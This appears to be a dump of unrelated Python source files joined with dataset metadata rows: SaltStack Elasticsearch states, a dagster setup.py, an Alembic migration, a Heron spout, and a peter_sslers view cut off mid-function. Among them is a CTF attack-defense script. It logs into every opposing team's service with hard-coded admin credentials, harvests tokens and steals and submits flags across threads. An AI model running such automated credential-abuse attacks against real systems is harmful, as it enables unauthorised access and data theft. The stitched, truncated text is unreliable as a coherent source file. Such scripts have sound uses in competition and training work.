def pipeline_absent(name):
'''
Ensure that the named pipeline is absent
name
Name of the pipeline to remove
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
pipeline = __salt__['elasticsearch.pipeline_get'](id=name)
if pipeline and name in pipeline:
if __opts__['test']:
ret['comment'] = 'Pipeline {0} will be removed'.format(name)
ret['changes']['old'] = pipeline[name]
ret['result'] = None
else:
ret['result'] = __salt__['elasticsearch.pipeline_delete'](id=name)
if ret['result']:
ret['comment'] = 'Successfully removed pipeline {0}'.format(name)
ret['changes']['old'] = pipeline[name]
else:
ret['comment'] = 'Failed to remove pipeline {0} for unknown reasons'.format(name)
else:
ret['comment'] = 'Pipeline {0} is already absent'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def pipeline_present(name, definition):
'''
Ensure that the named pipeline is present.
name
Name of the index to add
definition
Required dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/master/pipeline.html
**Example:**
.. code-block:: yaml
test_pipeline:
elasticsearch.pipeline_present:
- definition:
description: example pipeline
processors:
- set:
field: collector_timestamp_millis
value: '{{ '{{' }}_ingest.timestamp{{ '}}' }}'
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
pipeline = __salt__['elasticsearch.pipeline_get'](id=name)
old = {}
if pipeline and name in pipeline:
old = pipeline[name]
ret['changes'] = __utils__['dictdiffer.deep_diff'](old, definition)
if ret['changes'] or not definition:
if __opts__['test']:
if not pipeline:
ret['comment'] = 'Pipeline {0} does not exist and will be created'.format(name)
else:
ret['comment'] = 'Pipeline {0} exists with wrong configuration and will be overridden'.format(name)
ret['result'] = None
else:
output = __salt__['elasticsearch.pipeline_create'](id=name, body=definition)
if output:
if not pipeline:
ret['comment'] = 'Successfully created pipeline {0}'.format(name)
else:
ret['comment'] = 'Successfully replaced pipeline {0}'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Cannot create pipeline {0}, {1}'.format(name, output)
else:
ret['comment'] = 'Pipeline {0} is already present'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def search_template_absent(name):
'''
Ensure that the search template is absent
name
Name of the search template to remove
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
template = __salt__['elasticsearch.search_template_get'](id=name)
if template:
if __opts__['test']:
ret['comment'] = 'Search template {0} will be removed'.format(name)
ret['changes']['old'] = salt.utils.json.loads(template["template"])
ret['result'] = None
else:
ret['result'] = __salt__['elasticsearch.search_template_delete'](id=name)
if ret['result']:
ret['comment'] = 'Successfully removed search template {0}'.format(name)
ret['changes']['old'] = salt.utils.json.loads(template["template"])
else:
ret['comment'] = 'Failed to remove search template {0} for unknown reasons'.format(name)
else:
ret['comment'] = 'Search template {0} is already absent'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def search_template_present(name, definition):
'''
Ensure that the named search template is present.
name
Name of the search template to add
definition
Required dict for creation parameters as per http://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html
**Example:**
.. code-block:: yaml
test_pipeline:
elasticsearch.search_template_present:
- definition:
inline:
size: 10
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
template = __salt__['elasticsearch.search_template_get'](id=name)
old = {}
if template:
old = salt.utils.json.loads(template["template"])
ret['changes'] = __utils__['dictdiffer.deep_diff'](old, definition)
if ret['changes'] or not definition:
if __opts__['test']:
if not template:
ret['comment'] = 'Search template {0} does not exist and will be created'.format(name)
else:
ret['comment'] = 'Search template {0} exists with wrong configuration and will be overridden'.format(name)
ret['result'] = None
else:
output = __salt__['elasticsearch.search_template_create'](id=name, body=definition)
if output:
if not template:
ret['comment'] = 'Successfully created search template {0}'.format(name)
else:
ret['comment'] = 'Successfully replaced search template {0}'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Cannot create search template {0}, {1}'.format(name, output)
else:
ret['comment'] = 'Search template {0} is already present'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
| 36.476673 | 142 | 0.54368 |
acfa7d067bbb9209be5c6f9152c46afb2538ccde | 2,612 | py | Python | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 73 | 2020-06-14T03:25:45.000Z | 2022-03-30T10:22:08.000Z | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 6 | 2020-06-18T17:17:36.000Z | 2021-10-04T09:38:12.000Z | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 30 | 2020-06-11T17:29:56.000Z | 2022-03-14T00:39:31.000Z | from pwn import *
from utilities import extract_flag, submit_flag
import json
import threading
port = 8080
def random_string(l):
return ''.join(random.choice(string.ascii_letters) for i in range(l))
def register(username, email, password, host):
r = remote(host, port, level='error')
r.sendline('1')
print(r.recvuntil('Username: ').decode())
r.sendline(username)
print(r.recvuntil('Email: ').decode())
r.sendline(email)
print(r.recvuntil('Password:').decode())
r.sendline(password)
r.close()
def admin_stuff(host):
r = remote(host, port, level='error')
print('\n\n DOING ADMIN STUFF \n\n')
print(r.recvuntil('Your choice(1-2): ').decode())
r.sendline('2')
print(r.recvuntil('Email: ').decode())
r.sendline('admin@gmail.com')
print(r.recvuntil('Password: ').decode())
r.sendline('adminpassword')
x = r.recvall().decode().strip().split('\n')[2:]
return x
def exploit(email, password, token, host):
r = remote(host, port, level='error')
print('\n\n DOING EXPLOIT \n\n')
r.recvuntil('Your choice(1-2): ').decode()
r.sendline('2')
r.recvuntil('Email: ').decode()
r.sendline(email)
r.recvuntil('Password: ').decode()
r.sendline(password)
r.recvuntil('Your choice(1-3): ').decode()
r.sendline('2')
r.sendline(token)
text = r.recvall().decode()
flags = extract_flag(text)
r.close()
print(f'GOT FLAG {flags[0]}\n\n\n')
print(host)
return flags
teams = json.load(open('teamlist.json'))
used_tokens = {}
def exploit_team():
while True:
if len(teams) == 0:
return
else:
team = teams.pop()
try:
host = team['ip']
username = random_string(10)
email = username + '@gmail.com'
password = random_string(10)
register(username, email, password, host)
tokens = admin_stuff(host)
if not used_tokens.get(team['ip']):
used_tokens[team['ip']] = {}
for token in tokens:
if token not in used_tokens[team['ip']]:
used_tokens[team['ip']][token] = exploit(email, password, token, host)[0]
print(f'\n\n\n\n\n\nSUBMITTING FOR TEAM {team}\n\n\n\n\n\n')
submit_flag(list(used_tokens[team['ip']].values()))
except Exception:
print(f'Failed for {team["name"]}')
jobs = []
for i in range(10):
x = threading.Thread(target=exploit_team)
jobs.append(x)
x.start()
for job in jobs:
job.join()
| 20.730159 | 93 | 0.57925 |
acfa7d3d15df49956be0f5422eb5072b7c034fe7 | 184 | py | Python | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 5 | 2021-12-29T12:55:34.000Z | 2022-03-01T17:57:21.000Z | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 10 | 2021-12-29T02:15:55.000Z | 2022-03-09T11:04:22.000Z | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 2 | 2021-12-29T01:42:12.000Z | 2022-02-15T13:46:33.000Z | class Something:
"""Represent something."""
"""unexpected description"""
def do_something(self) -> None:
pass
__book_url__ = "dummy"
__book_version__ = "dummy"
| 15.333333 | 35 | 0.641304 |
acfa7dd513ecb01a2cbdc0550eabb4372013d461 | 1,852 | py | Python | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | 1 | 2019-11-25T19:03:32.000Z | 2019-11-25T19:03:32.000Z | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | null | null | null | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | null | null | null | import argparse
import sys
from setuptools import find_packages, setup
def get_version(name):
version = {}
with open('dagster_aws/version.py') as fp:
exec(fp.read(), version) # pylint: disable=W0122
if name == 'dagster-aws':
return version['__version__']
elif name == 'dagster-aws-nightly':
return version['__nightly__']
else:
raise Exception('Shouldn\'t be here: bad package name {name}'.format(name=name))
parser = argparse.ArgumentParser()
parser.add_argument('--nightly', action='store_true')
def _do_setup(name='dagster-aws'):
setup(
name='dagster_aws',
version=get_version(name),
author='Elementl',
license='Apache-2.0',
description='Package for AWS-specific Dagster framework solid and resource components.',
url='https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-aws',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
packages=find_packages(exclude=['test']),
include_package_data=True,
install_requires=['boto3==1.9.*', 'dagster', 'requests', 'terminaltables'],
tests_require=['moto==1.3.*'],
extras_require={':python_version<"3"': ['backports.tempfile']},
entry_points={'console_scripts': ['dagster-aws = dagster_aws.cli.cli:main']},
zip_safe=False,
)
if __name__ == '__main__':
parsed, unparsed = parser.parse_known_args()
sys.argv = [sys.argv[0]] + unparsed
if parsed.nightly:
_do_setup('dagster-aws-nightly')
else:
_do_setup('dagster-aws')
| 33.071429 | 101 | 0.62959 |
acfa7e1e26f7cc7f4ef22d4f028db73112f59ddb | 1,967 | py | Python | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | 1 | 2021-12-05T19:16:16.000Z | 2021-12-05T19:16:16.000Z | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | null | null | null | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | null | null | null | """Report and Meta tables - initial creation
Revision ID: f59c3dad9acd
Revises:
Create Date: 2021-08-12 18:08:50.873779
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f59c3dad9acd'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('report',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.Unicode(length=255), nullable=True),
sa.Column('description', sa.UnicodeText(), nullable=True),
sa.Column('photo_url', sa.String(length=100), nullable=True),
sa.Column('thumbnail_url', sa.String(length=100), nullable=True),
sa.Column('latitude', sa.Numeric(precision=8, scale=6), nullable=True),
sa.Column('longitude', sa.Numeric(precision=9, scale=6), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('key_category', sa.String(length=100), nullable=True),
sa.Column('id_service', sa.SmallInteger(), nullable=True),
sa.Column('status', sa.Unicode(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('meta',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('report_id', sa.Integer(), nullable=False),
sa.Column('tweeted', sa.Boolean(), server_default=sa.text('false'), nullable=False),
sa.Column('photo_downloaded', sa.Boolean(), server_default=sa.text('false'), nullable=False),
sa.Column('thumb_downloaded', sa.Boolean(), server_default=sa.text('false'), nullable=False),
sa.ForeignKeyConstraint(['report_id'], ['report.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('meta')
op.drop_table('report')
# ### end Alembic commands ###
| 37.113208 | 97 | 0.684291 |
acfa7e61716d2561d31430e3ad430fa99d9afcdd | 909 | py | Python | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import print_function
import curses
import sys
class CursesAPI(object):
"""A dummy curses wrapper that allows us to intercept these
calls when in a test environment"""
def __init__(self):
pass
def useDefaultColors(self):
curses.use_default_colors()
def echo(self):
curses.echo()
def noecho(self):
curses.noecho()
def initPair(self, pairNumber, fg, bg):
return curses.init_pair(pairNumber, fg, bg)
def colorPair(self, colorNumber):
return curses.color_pair(colorNumber)
def getColorPairs(self):
return curses.COLOR_PAIRS
def exit(self):
sys.exit(0)
def allowFileOutput(self):
return True
| 21.642857 | 65 | 0.674367 |
acfa7ff38a6d76b480413cffe8ff56bdce93deb6 | 581 | py | Python | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 147 | 2019-10-07T11:01:54.000Z | 2021-11-16T02:51:18.000Z | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 1 | 2019-12-03T12:40:21.000Z | 2019-12-03T12:40:21.000Z | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 19 | 2019-12-21T15:58:44.000Z | 2021-09-03T08:32:38.000Z |
import torch
class RegualizerNMUZ:
def __init__(self, zero=False):
self.zero = zero
self.stored_inputs = []
def __call__(self, W):
if self.zero:
return 0
x_mean = torch.mean(
torch.cat(self.stored_inputs, dim=0),
dim=0, keepdim=True
)
return torch.mean((1 - W) * (1 - x_mean)**2)
def append_input(self, x):
if self.zero:
return
self.stored_inputs.append(x)
def reset(self):
if self.zero:
return
self.stored_inputs = []
| 20.75 | 52 | 0.524957 |
acfa82fc4b5056789cbcd3ae176a0cf24463bf04 | 1,901 | py | Python | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | 1 | 2017-11-06T08:23:43.000Z | 2017-11-06T08:23:43.000Z | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | null | null | null | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 - Twitter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''fixedlinesspout.py: module that implements a very simple Spout that emits
a bunch of fixed lines'''
from heron.api.src.python import Spout, Stream
class FixedLinesSpout(Spout):
"""FixedLinesSpout: Generates a line from a set of static lines again and again
"""
outputs = [Stream(fields=['_output_'], name='output')]
# pylint: disable=unused-argument
def initialize(self, config, context):
"""Implements FixedLines Spout's initialize method"""
self.logger.info("Initializing FixedLinesSpout with the following")
self.logger.info("Component-specific config: \n%s" % str(config))
self.words = ["Mary had a little lamb",
"Humpy Dumpy sat on a wall",
"Here we round the Moulberry bush"]
self.index = 0
self.emit_count = 0
self.ack_count = 0
self.fail_count = 0
def _get_next_line(self):
retval = self.words[self.index]
self.index += 1
if self.index >= len(self.words):
self.index = 0
return retval
def next_tuple(self):
self.emit([self._get_next_line()], stream='output')
self.emit_count += 1
def ack(self, tup_id):
self.ack_count += 1
self.logger.debug("Acked tuple %s" % str(tup_id))
def fail(self, tup_id):
self.fail_count += 1
self.logger.debug("Failed tuple %s" % str(tup_id))
| 34.563636 | 81 | 0.692793 |
acfa83b50ccdf65f53c92f5b0ddbea8370121921 | 2,169 | py | Python | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | class Ear:
index = 0
prew = 0
next = 0
coords = []
neighbour_coords = []
def __init__(self, points, indexes, ind):
self.index = ind
self.coords = points[ind]
length = len(indexes)
index_in_indexes_arr = indexes.index(ind)
self.next = indexes[(index_in_indexes_arr + 1) % length]
if index_in_indexes_arr == 0:
self.prew = indexes[length - 1]
else:
self.prew = indexes[index_in_indexes_arr - 1]
self.neighbour_coords = [
points[self.prew],
points[self.next]
]
def is_inside(self, point):
p1 = self.coords
p2 = self.neighbour_coords[0]
p3 = self.neighbour_coords[1]
p0 = point
d = [
(p1[0] - p0[0]) * (p2[1] - p1[1]) - (p2[0] - p1[0]) * (p1[1] - p0[1]),
(p2[0] - p0[0]) * (p3[1] - p2[1]) - (p3[0] - p2[0]) * (p2[1] - p0[1]),
(p3[0] - p0[0]) * (p1[1] - p3[1]) - (p1[0] - p3[0]) * (p3[1] - p0[1])
]
if d[0] * d[1] >= 0 and d[2] * d[1] >= 0 and d[0] * d[2] >= 0:
return True
return False
def is_ear_point(self, p):
if p == self.coords or p in self.neighbour_coords:
return True
return False
def validate(self, points, indexes, ears):
not_ear_points = []
for i in indexes:
if points[i] != self.coords and points[i] not in self.neighbour_coords:
not_ear_points.append(points[i])
insides = [self.is_inside(p) for p in not_ear_points]
if self.is_convex() and True not in insides:
for e in ears:
if e.is_ear_point(self.coords):
return False
return True
return False
def is_convex(self):
a = self.neighbour_coords[0]
b = self.coords
c = self.neighbour_coords[1]
ab = [b[0] - a[0], b[1] - a[1]]
bc = [c[0] - b[0], c[1] - b[1]]
if ab[0] * bc[1] - ab[1] * bc[0] <= 0:
return False
return True
def get_triangle(self):
return [self.prew, self.index, self.next]
| 30.985714 | 83 | 0.49562 |
acfa83f2e08be68f4c455ea0a693968b26b6ef9d | 61,598 | py | Python | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | # pypi
from pyramid.httpexceptions import HTTPNotFound
from pyramid.httpexceptions import HTTPSeeOther
from pyramid.renderers import render_to_response
from pyramid.view import view_config
# local
from ..lib import formhandling
from ..lib.docs import docify
from ..lib.docs import formatted_get_docs
from ..lib.form_utils import AcmeAccountUploadParser
from ..lib.forms import Form_AcmeAccount_deactivate
from ..lib.forms import Form_AcmeAccount_deactivate_authorizations
from ..lib.forms import Form_AcmeAccount_edit
from ..lib.forms import Form_AcmeAccount_key_change
from ..lib.forms import Form_AcmeAccount_mark
from ..lib.forms import Form_AcmeAccount_new__auth
from ..lib.forms import Form_AcmeAccount_new__file
from ..lib.handler import Handler
from ..lib.handler import items_per_page
from ..lib.handler import json_pagination
from ...lib import cert_utils
from ...lib import db as lib_db
from ...lib import errors
from ...lib import utils
from ...lib._compat import quote_plus
from ...model import utils as model_utils
# ==============================================================================
class View_List(Handler):
@view_config(route_name="admin:acme_accounts", renderer="/admin/acme_accounts.mako")
@view_config(
route_name="admin:acme_accounts_paginated",
renderer="/admin/acme_accounts.mako",
)
@view_config(route_name="admin:acme_accounts|json", renderer="json")
@view_config(route_name="admin:acme_accounts_paginated|json", renderer="json")
@docify(
{
"endpoint": "/acme-accounts.json",
"section": "acme-account",
"about": """list AcmeAccount(s)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-accounts.json",
}
)
@docify(
{
"endpoint": "/acme-accounts/{PAGE}.json",
"section": "acme-account",
"example": "curl {ADMIN_PREFIX}/acme-accounts/1.json",
"variant_of": "/acme-accounts.json",
}
)
def list(self):
items_count = lib_db.get.get__AcmeAccount__count(self.request.api_context)
url_template = (
"%s/acme-accounts/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
if self.request.wants_json:
url_template = "%s.json" % url_template
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__AcmeAccount__paginated(
self.request.api_context, limit=items_per_page, offset=offset
)
if self.request.wants_json:
_accounts = {k.id: k.as_json for k in items_paged}
return {
"AcmeAccounts": _accounts,
"pagination": json_pagination(items_count, pager),
}
return {
"project": "peter_sslers",
"AcmeAccounts_count": items_count,
"AcmeAccounts": items_paged,
"pager": pager,
}
class View_New(Handler):
@view_config(route_name="admin:acme_account:upload")
@view_config(route_name="admin:acme_account:upload|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/upload.json",
"section": "acme-account",
"about": """upload an AcmeAccount and AcmeAccountKey""",
"POST": True,
"GET": None,
"examples": [
"curl --form 'account_key_file_pem=@key.pem' --form 'acme_account_provider_id=1' {ADMIN_PREFIX}/acme-account/upload.json",
"curl --form 'account_key_file_le_meta=@meta.json' 'account_key_file_le_pkey=@private_key.json' 'account_key_file_le_reg=@regr.json' {ADMIN_PREFIX}/acme-account/upload.json",
],
"form_fields": {
"account_key_file_pem": "Group A",
"acme_account_provider_id": "Group A",
"account_key_file_le_meta": "Group B",
"account_key_file_le_pkey": "Group B",
"account_key_file_le_reg": "Group B",
"account__contact": "the contact's email address for the ACME Server",
"account__private_key_cycle": "how should the PrivateKey be cycled for this account?",
},
"notes": [
"You must submit ALL items from Group A or Group B",
],
"valid_options": {
"acme_account_provider_id": "{RENDER_ON_REQUEST}",
"account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
},
}
)
def upload(self):
if self.request.method == "POST":
return self._upload__submit()
return self._upload__print()
def _upload__print(self):
self._load_AcmeAccountProviders()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/upload.json")
# quick setup, we need a bunch of options for dropdowns...
return render_to_response(
"/admin/acme_account-upload.mako",
{"AcmeAccountProviders": self.dbAcmeAccountProviders},
self.request,
)
def _upload__submit(self):
try:
(result, formStash) = formhandling.form_validate(
self.request, schema=Form_AcmeAccount_new__file, validate_get=False
)
if not result:
raise formhandling.FormInvalid()
parser = AcmeAccountUploadParser(formStash)
parser.require_upload(require_contact=None, require_technology=False)
# this will have `contact` and `private_key_cycle`
key_create_args = parser.getcreate_args
acme_account_provider_id = key_create_args.get("acme_account_provider_id")
if acme_account_provider_id:
self._load_AcmeAccountProviders()
_acme_account_provider_ids__all = [
i.id for i in self.dbAcmeAccountProviders
]
if acme_account_provider_id not in _acme_account_provider_ids__all:
# `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
formStash.fatal_field(
field="acme_account_provider_id",
message="Invalid provider submitted.",
)
key_create_args["event_type"] = "AcmeAccount__insert"
key_create_args[
"acme_account_key_source_id"
] = model_utils.AcmeAccountKeySource.from_string("imported")
try:
(dbAcmeAccount, _is_created,) = lib_db.getcreate.getcreate__AcmeAccount(
self.request.api_context, **key_create_args
)
except errors.ConflictingObject as exc:
# ConflictingObject: args[0] = tuple(conflicting_object, error_message_string)
# `formStash.fatal_form()` will raise `FormFieldInvalid(FormInvalid)`
formStash.fatal_form(message=exc.args[0][1])
if self.request.wants_json:
return {
"result": "success",
"AcmeAccount": dbAcmeAccount.as_json,
"is_created": True if _is_created else False,
"is_existing": False if _is_created else True,
}
return HTTPSeeOther(
"%s/acme-account/%s?result=success&operation=upload%s"
% (
self.request.admin_url,
dbAcmeAccount.id,
("&is_created=1" if _is_created else "&is_existing=1"),
)
)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return formhandling.form_reprint(self.request, self._upload__print)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:acme_account:new")
@view_config(route_name="admin:acme_account:new|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/new.json",
"section": "acme-account",
"about": """Create a new AcmeAccount""",
"POST": True,
"GET": None,
"instructions": [
"""curl --form 'account_key_file_pem=@key.pem' --form 'acme_account_provider_id=1' {ADMIN_PREFIX}/acme-account/new.json""",
],
"form_fields": {
"acme_account_provider_id": "which provider",
"account__contact": "the contact's email address for the ACME Server",
"account__private_key_cycle": "how should the PrivateKey be cycled for this account?",
"account__private_key_technology": "what is the key technology preference for this account?",
},
"valid_options": {
"acme_account_provider_id": "{RENDER_ON_REQUEST}",
"account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
"account__private_key_technology": model_utils.KeyTechnology._options_AcmeAccount_private_key_technology,
},
}
)
def new(self):
if self.request.method == "POST":
return self._new__submit()
return self._new__print()
def _new__print(self):
self._load_AcmeAccountProviders()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/new.json")
# quick setup, we need a bunch of options for dropdowns...
return render_to_response(
"/admin/acme_account-new.mako",
{"AcmeAccountProviders": self.dbAcmeAccountProviders},
self.request,
)
def _new__submit(self):
try:
(result, formStash) = formhandling.form_validate(
self.request, schema=Form_AcmeAccount_new__auth, validate_get=False
)
if not result:
raise formhandling.FormInvalid()
self._load_AcmeAccountProviders()
_acme_account_provider_ids__all = [
i.id for i in self.dbAcmeAccountProviders
]
_acme_account_provider_ids__enabled = [
i.id for i in self.dbAcmeAccountProviders if i.is_enabled
]
acme_account_provider_id = formStash.results["acme_account_provider_id"]
if acme_account_provider_id not in _acme_account_provider_ids__all:
# `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
formStash.fatal_field(
field="acme_account_provider_id",
message="Invalid provider submitted.",
)
if acme_account_provider_id not in _acme_account_provider_ids__enabled:
# `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
formStash.fatal_field(
field="acme_account_provider_id",
message="This provider is no longer enabled.",
)
parser = AcmeAccountUploadParser(formStash)
parser.require_new(require_contact=True)
# this will have `contact` and `private_key_cycle`
key_create_args = parser.getcreate_args
key_pem = cert_utils.new_account_key() # rsa_bits=None
key_create_args["key_pem"] = key_pem
key_create_args["event_type"] = "AcmeAccount__create"
key_create_args[
"acme_account_key_source_id"
] = model_utils.AcmeAccountKeySource.from_string("generated")
dbAcmeAccount = None
_dbAcmeAccount = None
try:
(
_dbAcmeAccount,
_is_created,
) = lib_db.getcreate.getcreate__AcmeAccount(
self.request.api_context, **key_create_args
)
# result is either: `new-account` or `existing-account`
# failing will raise an exception
authenticatedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_register(
self.request.api_context, _dbAcmeAccount
)
dbAcmeAccount = _dbAcmeAccount
except errors.ConflictingObject as exc:
# this happens via `getcreate__AcmeAccount`
# * args[0] = tuple(conflicting_object, error_message_string)
_dbAcmeAccountDuplicate = exc.args[0][0]
# `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
formStash.fatal_field(
field="account__contact",
message=exc.args[0][1],
)
except errors.AcmeDuplicateAccount as exc:
# this happens via `do__AcmeAccount_AcmeV2_register`
# args[0] MUST be the duplicate AcmeAccount
_dbAcmeAccountDuplicate = exc.args[0]
# the 'Duplicate' account was the earlier account and therefore
# it is our merge Target
lib_db.update.update_AcmeAccount_from_new_duplicate(
self.request.api_context, _dbAcmeAccountDuplicate, _dbAcmeAccount
)
dbAcmeAccount = _dbAcmeAccountDuplicate
if self.request.wants_json:
return {
"result": "success",
"AcmeAccount": dbAcmeAccount.as_json,
"is_created": True if _is_created else False,
"is_existing": False if _is_created else True,
}
return HTTPSeeOther(
"%s/acme-account/%s?result=success&operation=new%s"
% (
self.request.admin_url,
dbAcmeAccount.id,
("&is_created=1" if _is_created else "&is_existing=1"),
)
)
except errors.AcmeServerError as exc:
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
formStash.register_error_main_exception(exc)
return formhandling.form_reprint(self.request, self._new__print)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return formhandling.form_reprint(self.request, self._new__print)
class View_Focus(Handler):
dbAcmeAccount = None
def _focus(self):
if self.dbAcmeAccount is None:
dbAcmeAccount = lib_db.get.get__AcmeAccount__by_id(
self.request.api_context,
self.request.matchdict["id"],
)
if not dbAcmeAccount:
raise HTTPNotFound("the key was not found")
self.dbAcmeAccount = dbAcmeAccount
self._focus_url = "%s/acme-account/%s" % (
